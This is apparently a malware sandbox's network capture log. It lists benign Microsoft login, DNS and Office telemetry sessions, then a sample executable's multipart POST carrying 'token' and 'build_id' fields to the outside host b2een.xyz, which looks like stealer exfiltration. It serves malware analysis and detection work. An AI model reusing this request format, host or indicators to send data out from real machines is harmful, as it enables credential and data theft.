ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="28efa5d6-7e9e-4c18-b157-7dfd03c67e10" LicenseID="3252b20c-d425-4711
2024-11-25 10:34:05 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49879	20.190.147.1	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:03 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-25 10:34:03 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-25 10:34:04 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 25 Nov 2024 10:33:04 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BL2 x-ms-request-id: 89edd6de-ac45-45a4-a976-e6f1e5fc0e46 PPServer: PPV: 30 H: BL02EPF00027823 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 25 Nov 2024 10:34:03 GMT Connection: close Content-Length: 1276
2024-11-25 10:34:04 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49891	162.159.61.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:04 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 10:34:04 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e80fbf10f790f3d-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 10:34:04 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0e 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:04 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 8f21b959-301e-0096-6e6c-3de71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103404Z-174c587ffdf9xbcchC1TEBxkz400000005r0000000004utv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:04 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:04 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 358685dd-301e-005d-4f7d-3be448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103404Z-174c587ffdf89smkhC1TEB697s00000005yg0000000044dy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:04 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:04 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 6d656984-c01e-008d-0d1b-3d2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103404Z-178bfbc474bq2pr7hC1NYCkfgg00000007e0000000007x5k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:04 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:04 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: a9288e84-901e-0016-0fbf-3eefe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103404Z-178bfbc474bbbqrhhC1NYCvw7400000007f0000000007kz9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:04 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:04 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:04 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 29108258-301e-0052-78fc-3d65d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103404Z-178bfbc474bpscmfhC1NYCfc2c00000005x0000000006s2f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-25 10:34:04 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49894	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------GHJDGDBFCBKFHJKFHCBKCont
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 